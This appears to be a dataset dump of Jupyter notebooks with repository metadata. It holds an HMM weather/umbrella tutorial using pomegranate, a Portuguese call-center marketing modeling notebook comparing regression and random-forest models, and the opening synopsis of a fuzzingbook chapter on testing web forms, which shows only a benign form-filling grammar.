textbook [Artificial Intelligence: A Modern Approach](http://aima.cs.berkeley.edu/).\n\n> You are the security guard stationed at a secret under-ground installation. Each day, you try to guess whether it’s raining today, but your only access to the outside world occurs each morning when you see the director coming in with, or without, an umbrella.\n\nA simplified diagram of the required network topology is shown below.\n\n![](_example.png)\n\n### Describing the Network\n\n<div class=\"alert alert-block alert-warning\">\n$\\lambda = (A, B)$ specifies a Hidden Markov Model in terms of an emission probability distribution $A$ and a state transition probability distribution $B$.\n</div>\n\nHMM networks are parameterized by two distributions: the emission probabilties giving the conditional probability of observing evidence values for each hidden state, and the transition probabilities giving the conditional probability of moving between states during the sequence. 
Additionally, you can specify an initial distribution describing the probability of a sequence starting in each state.\n\n<div class=\"alert alert-block alert-warning\">\nAt each time $t$, $X_t$ represents the hidden state, and $Y_t$ represents an observation at that time.\n</div>\n\nIn this problem, $t$ corresponds to each day of the week and the hidden state represent the weather outside (whether it is Rainy or Sunny) and observations record whether the security guard sees the director carrying an umbrella or not.\n\nFor example, during some particular week the guard may observe an umbrella ['yes', 'no', 'yes', 'no', 'yes'] on Monday-Friday, while the weather outside is ['Rainy', 'Sunny', 'Sunny', 'Sunny', 'Rainy']. In that case, $t=Wednesday$, $Y_{Wednesday}=yes$, and $X_{Wednesday}=Sunny$. (It might be surprising that the guard would observe an umbrella on a sunny day, but it is possible under this type of model.)\n\n### Initializing an HMM Network with Pomegranate\nThe Pomegranate library supports [two initialization methods](http://pomegranate.readthedocs.io/en/latest/HiddenMarkovModel.html#initialization). You can either explicitly provide the three distributions, or you can build the network line-by-line. We'll use the line-by-line method for the example network, but you're free to use either method for the part of speech tagger.", "_____no_output_____" ] ], [ [ "# create the HMM model\nmodel = HiddenMarkovModel(name=\"Example Model\")", "_____no_output_____" ] ], [ [ "### **IMPLEMENTATION**: Add the Hidden States\nWhen the HMM model is specified line-by-line, the object starts as an empty container. The first step is to name each state and attach an emission distribution.\n\n#### Observation Emission Probabilities: $P(Y_t | X_t)$\nWe need to assume that we have some prior knowledge (possibly from a data set) about the director's behavior to estimate the emission probabilities for each hidden state. In real problems you can often estimate the emission probabilities empirically, which is what we'll do for the part of speech tagger. Our imaginary data will produce the conditional probability table below. (Note that the rows sum to 1.0)\n\n| | $yes$ | $no$ |\n| --- | --- | --- |\n| $Sunny$ | 0.10 | 0.90 |\n| $Rainy$ | 0.80 | 0.20 |", "_____no_output_____" ] ], [ [ "# create the HMM model\nmodel = HiddenMarkovModel(name=\"Example Model\")\n\n# emission probability distributions, P(umbrella | weather)\nsunny_emissions = DiscreteDistribution({\"yes\": 0.1, \"no\": 0.9})\nsunny_state = State(sunny_emissions, name=\"Sunny\")\n\n# TODO: create a discrete distribution for the rainy emissions from the probability table\n# above & use that distribution to create a state named Rainy\nrainy_emissions = DiscreteDistribution({\"yes\": 0.8, \"no\": 0.2})\nrainy_state = State(rainy_emissions, name=\"Rainy\")\n\n# add the states to the model\nmodel.add_states(sunny_state, rainy_state)\n\nassert rainy_emissions.probability(\"yes\") == 0.8, \"The director brings his umbrella with probability 0.8 on rainy days\"\nprint(\"Looks good so far!\")", "Looks good so far!\n" ] ], [ [ "### **IMPLEMENTATION:** Adding Transitions\nOnce the states are added to the model, we can build up the desired topology of individual state transitions.\n\n#### Initial Probability $P(X_0)$:\nWe will assume that we don't know anything useful about the likelihood of a sequence starting in either state. 
If the sequences start each week on Monday and end each week on Friday (so each week is a new sequence), then this assumption means that it's equally likely that the weather on a Monday may be Rainy or Sunny. We can assign equal probability to each starting state by setting $P(X_0=Rainy) = 0.5$ and $P(X_0=Sunny)=0.5$:\n\n| $Sunny$ | $Rainy$ |\n| --- | ---\n| 0.5 | 0.5 |\n\n#### State transition probabilities $P(X_{t} | X_{t-1})$\nFinally, we will assume for this example that we can estimate transition probabilities from something like historical weather data for the area. In real problems you can often use the structure of the problem (like a language grammar) to impose restrictions on the transition probabilities, then re-estimate the parameters with the same training data used to estimate the emission probabilities. Under this assumption, we get the conditional probability table below. (Note that the rows sum to 1.0)\n\n| | $Sunny$ | $Rainy$ |\n| --- | --- | --- |\n|$Sunny$| 0.80 | 0.20 |\n|$Rainy$| 0.40 | 0.60 |", "_____no_output_____" ] ], [ [ "# create edges for each possible state transition in the model\n# equal probability of a sequence starting on either a rainy or sunny day\nmodel.add_transition(model.start, sunny_state, 0.5)\nmodel.add_transition(model.start, rainy_state, 0.5)\n\n# add sunny day transitions (we already know estimates of these probabilities\n# from the problem statement)\nmodel.add_transition(sunny_state, sunny_state, 0.8) # 80% sunny->sunny\nmodel.add_transition(sunny_state, rainy_state, 0.2) # 20% sunny->rainy\n\n# TODO: add rainy day transitions using the probabilities specified in the transition table\nmodel.add_transition(rainy_state, sunny_state, 0.4) # 40% rainy->sunny\nmodel.add_transition(rainy_state, rainy_state, 0.6) # 60% rainy->rainy\n\n# finally, call the .bake() method to finalize the model\nmodel.bake()\n\nassert model.edge_count() == 6, \"There should be two edges from model.start, two from Rainy, and two from Sunny\"\nassert model.node_count() == 4, \"The states should include model.start, model.end, Rainy, and Sunny\"\nprint(\"Great! You've finished the model.\")", "Great! You've finished the model.\n" ] ], [ [ "## Visualize the Network\n---\nWe have provided a helper function called `show_model()` that generates a PNG image from a Pomegranate HMM network. You can specify an optional filename to save the file to disk. Setting the \"show_ends\" argument True will add the model start & end states that are included in every Pomegranate network.", "_____no_output_____" ] ], [ [ "show_model(model, figsize=(5, 5), filename=\"example.png\", overwrite=True, show_ends=False)", "_____no_output_____" ] ], [ [ "### Checking the Model\nThe states of the model can be accessed using array syntax on the `HMM.states` attribute, and the transition matrix can be accessed by calling `HMM.dense_transition_matrix()`. Element $(i, j)$ encodes the probability of transitioning from state $i$ to state $j$. For example, with the default column order specified, element $(2, 1)$ gives the probability of transitioning from \"Rainy\" to \"Sunny\", which we specified as 0.4.\n\nRun the next cell to inspect the full state transition matrix, then read the . 
", "_____no_output_____" ] ], [ [ "column_order = [\"Example Model-start\", \"Sunny\", \"Rainy\", \"Example Model-end\"] # Override the Pomegranate default order\ncolumn_names = [s.name for s in model.states]\norder_index = [column_names.index(c) for c in column_order]\n\n# re-order the rows/columns to match the specified column order\ntransitions = model.dense_transition_matrix()[:, order_index][order_index, :]\nprint(\"The state transition matrix, P(Xt|Xt-1):\\n\")\nprint(transitions)\nprint(\"\\nThe transition probability from Rainy to Sunny is {:.0f}%\".format(100 * transitions[2, 1]))", "The state transition matrix, P(Xt|Xt-1):\n\n[[ 0. 0.5 0.5 0. ]\n [ 0. 0.8 0.2 0. ]\n [ 0. 0.4 0.6 0. ]\n [ 0. 0. 0. 0. ]]\n\nThe transition probability from Rainy to Sunny is 40%\n" ] ], [ [ "## Inference in Hidden Markov Models\n---\nBefore moving on, we'll use this simple network to quickly go over the Pomegranate API to perform the three most common HMM tasks:\n\n<div class=\"alert alert-block alert-info\">\n**Likelihood Evaluation**<br>\nGiven a model $\\lambda=(A,B)$ and a set of observations $Y$, determine $P(Y|\\lambda)$, the likelihood of observing that sequence from the model\n</div>\n\nWe can use the weather prediction model to evaluate the likelihood of the sequence [yes, yes, yes, yes, yes] (or any other state sequence). The likelihood is often used in problems like machine translation to weight interpretations in conjunction with a statistical language model.\n\n<div class=\"alert alert-block alert-info\">\n**Hidden State Decoding**<br>\nGiven a model $\\lambda=(A,B)$ and a set of observations $Y$, determine $Q$, the most likely sequence of hidden states in the model to produce the observations\n</div>\n\nWe can use the weather prediction model to determine the most likely sequence of Rainy/Sunny states for a known observation sequence, like [yes, no] -> [Rainy, Sunny]. We will use decoding in the part of speech tagger to determine the tag for each word of a sentence. The decoding can be further split into \"smoothing\" when we want to calculate past states, \"filtering\" when we want to calculate the current state, or \"prediction\" if we want to calculate future states. \n\n<div class=\"alert alert-block alert-info\">\n**Parameter Learning**<br>\nGiven a model topography (set of states and connections) and a set of observations $Y$, learn the transition probabilities $A$ and emission probabilities $B$ of the model, $\\lambda=(A,B)$\n</div>\n\nWe don't need to learn the model parameters for the weather problem or POS tagging, but it is supported by Pomegranate.\n\n### IMPLEMENTATION: Calculate Sequence Likelihood\n\nCalculating the likelihood of an observation sequence from an HMM network is performed with the [forward algorithm](https://en.wikipedia.org/wiki/Forward_algorithm). 
Pomegranate provides the `HMM.forward()` method to calculate the full matrix showing the likelihood of aligning each observation to each state in the HMM, and the `HMM.log_probability()` method to calculate the cumulative likelihood over all possible hidden state paths that the specified model generated the observation sequence.\n\nFill in the code in the next section with a sample observation sequence and then use the `forward()` and `log_probability()` methods to evaluate the sequence.", "_____no_output_____" ] ], [ [ "# TODO: input a sequence of 'yes'/'no' values in the list below for testing\nobservations = ['yes', 'no', 'yes']\n\nassert len(observations) > 0, \"You need to choose a sequence of 'yes'/'no' observations to test\"\n\n# TODO: use model.forward() to calculate the forward matrix of the observed sequence,\n# and then use np.exp() to convert from log-likelihood to likelihood\nforward_matrix = np.exp(model.forward(observations))\n\n# TODO: use model.log_probability() to calculate the all-paths likelihood of the\n# observed sequence and then use np.exp() to convert log-likelihood to likelihood\nprobability_percentage = np.exp(model.log_probability(observations))\n\n# Display the forward probabilities\nprint(\" \" + \"\".join(s.name.center(len(s.name)+6) for s in model.states))\nfor i in range(len(observations) + 1):\n print(\" <start> \" if i==0 else observations[i - 1].center(9), end=\"\")\n print(\"\".join(\"{:.0f}%\".format(100 * forward_matrix[i, j]).center(len(s.name) + 6)\n for j, s in enumerate(model.states)))\n\nprint(\"\\nThe likelihood over all possible paths \" + \\\n \"of this model producing the sequence {} is {:.2f}%\\n\\n\"\n .format(observations, 100 * probability_percentage))", " Rainy Sunny Example Model-start Example Model-end \n <start> 0% 0% 100% 0% \n yes 40% 5% 0% 0% \n no 5% 18% 0% 0% \n yes 5% 2% 0% 0% \n\nThe likelihood over all possible paths of this model producing the sequence ['yes', 'no', 'yes'] is 6.92%\n\n\n" ] ], [ [ "### IMPLEMENTATION: Decoding the Most Likely Hidden State Sequence\n\nThe [Viterbi algorithm](https://en.wikipedia.org/wiki/Viterbi_algorithm) calculates the single path with the highest likelihood to produce a specific observation sequence. Pomegranate provides the `HMM.viterbi()` method to calculate both the hidden state sequence and the corresponding likelihood of the viterbi path.\n\nThis is called \"decoding\" because we use the observation sequence to decode the corresponding hidden state sequence. In the part of speech tagging problem, the hidden states map to parts of speech and the observations map to sentences. Given a sentence, Viterbi decoding finds the most likely sequence of part of speech tags corresponding to the sentence.\n\nFill in the code in the next section with the same sample observation sequence you used above, and then use the `model.viterbi()` method to calculate the likelihood and most likely state sequence. 
Compare the Viterbi likelihood against the forward algorithm likelihood for the observation sequence.", "_____no_output_____" ] ], [ [ "# TODO: input a sequence of 'yes'/'no' values in the list below for testing\nobservations = ['yes', 'no', 'yes']\n\n# TODO: use model.viterbi to find the sequence likelihood & the most likely path\nviterbi_likelihood, viterbi_path = model.viterbi(observations)\n\nprint(\"The most likely weather sequence to have generated \" + \\\n \"these observations is {} at {:.2f}%.\"\n .format([s[1].name for s in viterbi_path[1:]], np.exp(viterbi_likelihood)*100)\n)", "The most likely weather sequence to have generated these observations is ['Rainy', 'Sunny', 'Rainy'] at 2.30%.\n" ] ], [ [ "### Forward likelihood vs Viterbi likelihood\nRun the cells below to see the likelihood of each sequence of observations with length 3, and compare with the viterbi path.", "_____no_output_____" ] ], [ [ "from itertools import product\n\nobservations = ['no', 'no', 'yes']\n\np = {'Sunny': {'Sunny': np.log(.8), 'Rainy': np.log(.2)}, 'Rainy': {'Sunny': np.log(.4), 'Rainy': np.log(.6)}}\ne = {'Sunny': {'yes': np.log(.1), 'no': np.log(.9)}, 'Rainy':{'yes':np.log(.8), 'no':np.log(.2)}}\no = observations\nk = []\nvprob = np.exp(model.viterbi(o)[0])\nprint(\"The likelihood of observing {} if the weather sequence is...\".format(o))\nfor s in product(*[['Sunny', 'Rainy']]*3):\n k.append(np.exp(np.log(.5)+e[s[0]][o[0]] + p[s[0]][s[1]] + e[s[1]][o[1]] + p[s[1]][s[2]] + e[s[2]][o[2]]))\n print(\"\\t{} is {:.2f}% {}\".format(s, 100 * k[-1], \" <-- Viterbi path\" if k[-1] == vprob else \"\"))\nprint(\"\\nThe total likelihood of observing {} over all possible paths is {:.2f}%\".format(o, 100*sum(k)))", "The likelihood of observing ['no', 'no', 'yes'] if the weather sequence is...\n\t('Sunny', 'Sunny', 'Sunny') is 2.59% \n\t('Sunny', 'Sunny', 'Rainy') is 5.18% <-- Viterbi path\n\t('Sunny', 'Rainy', 'Sunny') is 0.07% \n\t('Sunny', 'Rainy', 'Rainy') is 0.86% \n\t('Rainy', 'Sunny', 'Sunny') is 0.29% \n\t('Rainy', 'Sunny', 'Rainy') is 0.58% \n\t('Rainy', 'Rainy', 'Sunny') is 0.05% \n\t('Rainy', 'Rainy', 'Rainy') is 0.58% \n\nThe total likelihood of observing ['no', 'no', 'yes'] over all possible paths is 10.20%\n" ] ], [ [ "### Congratulations!\nYou've now finished the HMM warmup. You should have all the tools you need to complete the part of speech tagger project.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1de61ca4485bd07a5eb2e0f5c7210d7c04ee46
25,034
ipynb
Jupyter Notebook
notebooks/3-modelagem.ipynb
Srekin/Auto_Insurance
778a6d125f5d37f975c0fc0d5051bf8a98fe56a1
[ "MIT" ]
null
null
null
notebooks/3-modelagem.ipynb
Srekin/Auto_Insurance
778a6d125f5d37f975c0fc0d5051bf8a98fe56a1
[ "MIT" ]
null
null
null
notebooks/3-modelagem.ipynb
Srekin/Auto_Insurance
778a6d125f5d37f975c0fc0d5051bf8a98fe56a1
[ "MIT" ]
null
null
null
25.941969
154
0.524766
[ [ [ "# Teste Técnico para Ciência de Dados da Keyrus", "_____no_output_____" ], [ "## 1ª parte: Análise Exploratória\n\n- [x] Tipos de variáveis\n- [x] Medidas de posição\n- [x] Medidas de dispersão\n- [x] Tratamento de Missing Values\n- [x] Gráficos\n- [x] Análise de Outliers\n\n## 2ª parte: Estatística\n\n- [x] Estatística descritiva\n- [x] Identificação das distribuições das variáveis\n\n## 3ª parte: Modelagem\n\n- [x] Modelos de previsão\n- [x] Escolha de melhor modelo\n- [x] Avaliação de resultados\n- [x] Métricas", "_____no_output_____" ], [ "## Imports", "_____no_output_____" ] ], [ [ "# Data analysis and data wrangling\nimport numpy as np\nimport pandas as pd\n\n# Plotting\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport missingno as msno # missing values\n\n# Preprocessing\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Machine Learning\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\n\n# Metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import cross_val_score\n\n# Other\nfrom IPython.display import Image\nimport configparser\nimport warnings\nimport os\nimport time\nimport pprint", "_____no_output_____" ] ], [ [ "## Preparação do Diretório Principal", "_____no_output_____" ] ], [ [ "def prepare_directory_work(end_directory: str='notebooks'):\n # Current path\n curr_dir = os.path.dirname (os.path.realpath (\"__file__\")) \n \n if curr_dir.endswith(end_directory):\n os.chdir('..')\n return curr_dir\n \n return f'Current working directory: {curr_dir}'", "_____no_output_____" ], [ "prepare_directory_work(end_directory='notebooks')", "_____no_output_____" ] ], [ [ "## Cell Format", "_____no_output_____" ] ], [ [ "config = configparser.ConfigParser()\nconfig.read('src/visualization/plot_config.ini')\n\nfigure_titlesize = config['figure']['figure_titlesize']\nfigure_figsize_large = int(config['figure']['figure_figsize_large'])\nfigure_figsize_width = int(config['figure']['figure_figsize_width'])\nfigure_dpi = int(config['figure']['figure_dpi'])\nfigure_facecolor = config['figure']['figure_facecolor']\nfigure_autolayout = bool(config['figure']['figure_autolayout'])\n\nfont_family = config['font']['font_family']\nfont_size = int(config['font']['font_size'])\n\nlegend_loc = config['legend']['legend_loc']\nlegend_fontsize = int(config['legend']['legend_fontsize'])", "_____no_output_____" ], [ "# Customizing file matplotlibrc\n\n# Figure\nplt.rcParams['figure.titlesize'] = figure_titlesize\nplt.rcParams['figure.figsize'] = [figure_figsize_large, figure_figsize_width] \nplt.rcParams['figure.dpi'] = figure_dpi\nplt.rcParams['figure.facecolor'] = figure_facecolor\nplt.rcParams['figure.autolayout'] = figure_autolayout\n\n# Font\nplt.rcParams['font.family'] = font_family\nplt.rcParams['font.size'] = font_size\n\n# Legend\nplt.rcParams['legend.loc'] = legend_loc\nplt.rcParams['legend.fontsize'] = legend_fontsize", "_____no_output_____" ], [ "# Guarantees visualization inside the jupyter\n%matplotlib inline\n\n# Load the \"autoreload\" extension so that code can change\n%load_ext autoreload\n\n# Format the data os all table (float_format 3)\npd.set_option('display.float_format', '{:.6}'.format)\n\n# Print xxxx rows and columns\npd.set_option('display.max_rows', 
None)\npd.set_option('display.max_columns', None)\n\n# Supress unnecessary warnings so that presentation looks clean\nwarnings.filterwarnings('ignore')", "_____no_output_____" ] ], [ [ "## Carregamento dos Dados", "_____no_output_____" ] ], [ [ "%%time\n\ndf_callcenter = pd.read_csv('data/cleansing/callcenter_marketing_clenning.csv', \n encoding='utf8',\n delimiter=',',\n verbose=True)", "Tokenization took: 31.08 ms\nType conversion took: 33.04 ms\nParser memory cleanup took: 0.01 ms\nCPU times: user 83 ms, sys: 9.45 ms, total: 92.5 ms\nWall time: 92.8 ms\n" ], [ "df_callcenter.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 41167 entries, 0 to 41166\nData columns (total 15 columns):\nidade 41167 non-null int64\nprofissao 41167 non-null int64\neducacao 41167 non-null int64\nmeio_contato 41167 non-null int64\nmes 41167 non-null int64\ndia_da_semana 41167 non-null int64\nduracao 41167 non-null int64\ndias_ultimo_contato 41167 non-null int64\nqtd_contatos_total 41167 non-null int64\ncampanha_anterior 41167 non-null int64\nindice_precos_consumidor 41167 non-null float64\nindice_confianca_consumidor 41167 non-null float64\neuribor3m 41167 non-null float64\nnumero_empregados 41167 non-null int64\nresultado 41167 non-null int64\ndtypes: float64(3), int64(12)\nmemory usage: 4.7 MB\n" ] ], [ [ "OBS: carragamento em quase metade do tempo em realação a versão original do arquivo csv.", "_____no_output_____" ], [ "---\n\n## Variáveis Globais", "_____no_output_____" ] ], [ [ "# Lists that will be manipulated in the data processing\nlist_columns = []\nlist_categorical_col = []\nlist_numerical_col = []\nlist_without_target_col = []", "_____no_output_____" ], [ "def get_col(df: 'dataframe' = None,\n type_descr: 'numpy' = np.number) -> list:\n \"\"\"\n Function get list columns \n \n Args:\n type_descr\n np.number, np.object -> return list with all columns\n np.number -> return list numerical columns \n np.object -> return list object columns\n \"\"\"\n try:\n col = (df.describe(include=type_descr).columns) # pandas.core.indexes.base.Index \n except ValueError:\n print(f'Dataframe not contains {type_descr} columns !', end='\\n') \n else:\n return col.tolist() ", "_____no_output_____" ], [ "def get_col_without_target(df: 'dataframe',\n list_columns: list,\n target_col: str) -> list:\n\n col_target = list_columns.copy()\n \n col_target.remove(target_col)\n print(type(col_target))\n \n \n return col_target", "_____no_output_____" ], [ "list_numerical_col = get_col(df=df_callcenter,\n type_descr=np.number)\nlist_categorical_col = get_col(df=df_callcenter,\n type_descr=np.object)\nlist_columns = get_col(df=df_callcenter,\n type_descr=[np.object, np.number])\nlist_without_target_col = get_col_without_target(df=df_callcenter,\n list_columns=list_columns,\n target_col='resultado')", "Dataframe not contains <class 'object'> columns !\n<class 'list'>\n" ] ], [ [ "## Training and Testing Dataset\n- métrica: cross score", "_____no_output_____" ] ], [ [ "def cross_val_model(X,y, model, n_splits=3):\n 'Do split dataset and calculate cross_score'\n print(\"Begin training\", end='\\n\\n')\n start = time.time()\n \n X = np.array(X)\n y = np.array(y)\n folds = list(StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=2017).split(X, y))\n\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n y_train = y[train_idx]\n X_holdout = X[test_idx]\n y_holdout = y[test_idx]\n\n print (\"Fit %s fold %d\" % (str(model).split('(')[0], j+1))\n model.fit(X_train, y_train)\n cross_score = 
cross_val_score(model, X_holdout, y_holdout, cv=3, scoring='roc_auc')\n print(\"\\tcross_score: %.5f\" % cross_score.mean())\n \n end = time.time()\n print(\"\\nTraining done! Time Elapsed:\", end - start, \" seconds.\")", "_____no_output_____" ], [ "# training model\n\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado'] # target", "_____no_output_____" ] ], [ [ "---\n\n## Modelos de Previsão\n- Modelo Baseline\n- Benckmarks", "_____no_output_____" ], [ "### Modelo Baseline\n- Vou começar com um baseline, sendo o mais simples possível.", "_____no_output_____" ], [ "#### Linear Regression", "_____no_output_____" ] ], [ [ "# training model\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado']\n\nprint(X.shape)\nprint(y.shape)", "(41167, 14)\n(41167,)\n" ], [ "# Visualize params\n\nLinearRegression(n_jobs=-1)", "_____no_output_____" ], [ "# create model\nlr_model = LinearRegression(n_jobs=-1, normalize=False)", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, lr_model)", "Begin training\n\nFit LinearRegression fold 1\n\tcross_score: 0.81122\nFit LinearRegression fold 2\n\tcross_score: 0.82172\nFit LinearRegression fold 3\n\tcross_score: 0.82711\n\nTraining done! Time Elapsed: 0.32276058197021484 seconds.\n" ] ], [ [ "#### Linear Regression with Regularization", "_____no_output_____" ] ], [ [ "# create model\nlr_ridge_model = Ridge()", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, lr_ridge_model)", "Begin training\n\nFit Ridge fold 1\n\tcross_score: 0.81217\nFit Ridge fold 2\n\tcross_score: 0.82215\nFit Ridge fold 3\n\tcross_score: 0.82968\n\nTraining done! Time Elapsed: 0.17592835426330566 seconds.\n" ] ], [ [ "#### Polynomial Regression", "_____no_output_____" ] ], [ [ "poly = PolynomialFeatures(degree=2)\n\nX_poly = poly.fit_transform(X)\nprint(X_poly.shape)", "(41167, 120)\n" ], [ "# split dataset and calculate cross_score\ncross_val_model(X_poly, y, lr_model)", "Begin training\n\nFit LinearRegression fold 1\n\tcross_score: 0.80062\nFit LinearRegression fold 2\n\tcross_score: 0.75551\nFit LinearRegression fold 3\n\tcross_score: 0.56845\n\nTraining done! Time Elapsed: 4.029158353805542 seconds.\n" ] ], [ [ "### Benckmarks", "_____no_output_____" ], [ "#### RandomForest", "_____no_output_____" ] ], [ [ "# Visualize params\n\nRandomForestClassifier()", "_____no_output_____" ], [ "# RandomForest params dict\nrf_params_one = {}\n\nrf_params_one['n_estimators'] = 10\nrf_params_one['max_depth'] = 10\nrf_params_one['min_samples_split'] = 10\nrf_params_one['min_samples_leaf'] = 10 # end tree necessary 30 leaf\nrf_params_one['n_jobs'] = -1 # run all process", "_____no_output_____" ], [ "# create model\nrf_model_one = RandomForestClassifier(**rf_params_one)\n\n# training model\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado']", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_model_one)", "Begin training\n\nFit RandomForestClassifier fold 1\n\tcross_score: 0.20105\nFit RandomForestClassifier fold 2\n\tcross_score: 0.29913\nFit RandomForestClassifier fold 3\n\tcross_score: 0.21718\n\nTraining done! 
Time Elapsed: 2.6957101821899414 seconds.\n" ], [ "# RandomForest params dict\nrf_params_two = {}\n\nrf_params_two['n_estimators'] = 1\nrf_params_two['max_depth'] = len(list_numerical_col)*2\nrf_params_two['min_samples_split'] = len(list_numerical_col)\nrf_params_two['min_samples_leaf'] = len(list_numerical_col)\nrf_params_two['n_jobs'] = -1 # run all process", "_____no_output_____" ], [ "# create model\nrf_model = RandomForestClassifier(**rf_params_two, criterion='entropy')\n\n# training model\nX = df_callcenter[list_without_target_col]\ny = df_callcenter['resultado']", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_model)", "Begin training\n\nFit RandomForestClassifier fold 1\n\tcross_score: 0.30151\nFit RandomForestClassifier fold 2\n\tcross_score: 0.46162\nFit RandomForestClassifier fold 3\n\tcross_score: 0.28610\n\nTraining done! Time Elapsed: 0.47094202041625977 seconds.\n" ] ], [ [ "#### Random Forest Regressor", "_____no_output_____" ] ], [ [ "# Visualize params\n\nRandomForestRegressor()", "_____no_output_____" ], [ "# 1st model Random Forest\nrf_regressor_one = RandomForestRegressor(n_jobs = -1,\n verbose = 0)", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_regressor_one)", "Begin training\n\nFit RandomForestRegressor fold 1\n\tcross_score: 0.70972\nFit RandomForestRegressor fold 2\n\tcross_score: 0.75071\nFit RandomForestRegressor fold 3\n\tcross_score: 0.75449\n\nTraining done! Time Elapsed: 2.0970282554626465 seconds.\n" ], [ "# 2st model Random Forest\nrf_regressor_two = RandomForestRegressor(n_estimators = 1000,\n max_leaf_nodes = len(list_numerical_col)*8,\n min_samples_leaf = len(list_numerical_col),\n max_depth = len(list_numerical_col)*4,\n n_jobs = -1,\n verbose = 0)", "_____no_output_____" ], [ "# split dataset and calculate cross_score\ncross_val_model(X, y, rf_regressor_two)", "Begin training\n\nFit RandomForestRegressor fold 1\n\tcross_score: 0.77778\nFit RandomForestRegressor fold 2\n\tcross_score: 0.82433\nFit RandomForestRegressor fold 3\n\tcross_score: 0.84885\n\nTraining done! Time Elapsed: 37.298661947250366 seconds.\n" ] ], [ [ "---\n\n## Escolha do Melhor Modelo\n\nBaseado no cross_score o modelo escolhido será **random forest regressor** com os parâmetros do 2º modelo, que obteve um score > 0.84.", "_____no_output_____" ], [ "---\n\n#### Copyright\n\n<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-sa/4.0/\">\n <img alt=\"Creative Commons License\" align=\"right\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by-sa/4.0/88x31.png\" />\n</a>", "_____no_output_____" ], [ "This work by Bruno A. R. M. Campos is licensed under a [Creative Commons license](http://creativecommons.org/licenses/by-sa/4.0/).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ] ]
cb1df5d8eb9fa909308eca7ca9c0e513d9e10fe8
319,034
ipynb
Jupyter Notebook
docs/notebooks/WebFuzzer.ipynb
vrthra-forks/fuzzingbook
15319dcd7c213559cfe992c2e5936dab52929658
[ "MIT" ]
null
null
null
docs/notebooks/WebFuzzer.ipynb
vrthra-forks/fuzzingbook
15319dcd7c213559cfe992c2e5936dab52929658
[ "MIT" ]
null
null
null
docs/notebooks/WebFuzzer.ipynb
vrthra-forks/fuzzingbook
15319dcd7c213559cfe992c2e5936dab52929658
[ "MIT" ]
null
null
null
31.394804
1,759
0.540726
[ [ [ "# Testing Web Applications\n\nIn this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces. We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface. We also show how to conduct systematic attacks on these servers, notably with code and SQL injection.", "_____no_output_____" ] ], [ [ "from bookutils import YouTubeVideo\nYouTubeVideo('5agY5kg8Pvk')", "_____no_output_____" ] ], [ [ "**Prerequisites**\n\n* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).\n* Basic knowledge of HTML and HTTP is required.\n* Knowledge of SQL databases is helpful.", "_____no_output_____" ], [ "## Synopsis\n<!-- Automatically generated. Do not edit. -->\n\nTo [use the code provided in this chapter](Importing.ipynb), write\n\n```python\n>>> from fuzzingbook.WebFuzzer import <identifier>\n```\n\nand then make use of the following features.\n\n\nThis chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.\n\n### Fuzzing Web Forms\n\n`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.\n\nHere's the grammar extracted for our vulnerable Web server:\n\n```python\n>>> web_form_fuzzer = WebFormFuzzer(httpd_url)\n>>> web_form_fuzzer.grammar['<start>']\n['<action>?<query>']\n>>> web_form_fuzzer.grammar['<action>']\n['/order']\n>>> web_form_fuzzer.grammar['<query>']\n['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']\n```\nUsing it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.\n\n```python\n>>> web_form_fuzzer.fuzz()\n'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='\n```\nRepeated calls to 